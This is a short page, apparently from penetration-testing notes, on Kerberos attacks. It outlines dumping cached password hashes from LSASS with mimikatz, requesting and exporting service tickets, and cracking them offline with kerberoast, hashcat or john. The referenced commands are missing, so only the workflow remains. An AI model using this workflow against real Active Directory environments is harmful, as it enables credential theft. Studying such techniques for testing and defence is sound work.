Creating & Cracking TGS
There are a couple of weak points through which the kerberos authentication process can be hijacked to reveal sensitive information.
Cached Credentials
The user password is stored in the system memory in order to renew a TGT from a domain controller. The password is stored in the Local Security Authority Subsystem Service (LSASS) and there is no straight forward method to retrieve this password.
The user will require System or Local Administrator level permission to gain access to the hashes stored on a target.
We can use the mimikatz.exe tool to extract this information,
These commands will list the uses along with their passwords in various hash formats depending on the AD configuration. NTLM or WDigest algorithms may be used.
Listing TGT & Service Tickets
Just as retrieving passwords, we can also retrieve TGT or Service Tickets using mimikatz.
Now, in order to download the tickets, the user of that system should have requested for those tickets from TGS. But in the case where no tickets were already requested, fresh request can be made and then downloaded.
Using the above commands in powershell we can request for a ticket to any SPN. Then the tickets can be exported into a file using the following command within mimikatz,
The exported kirbi files can be cracked using kerberoast,
Alternatively the files can also be cracked using hashcat or john using the following commands,
John
Hashcat
Ensure that the tickets are in hashcat format for cracking
Last updated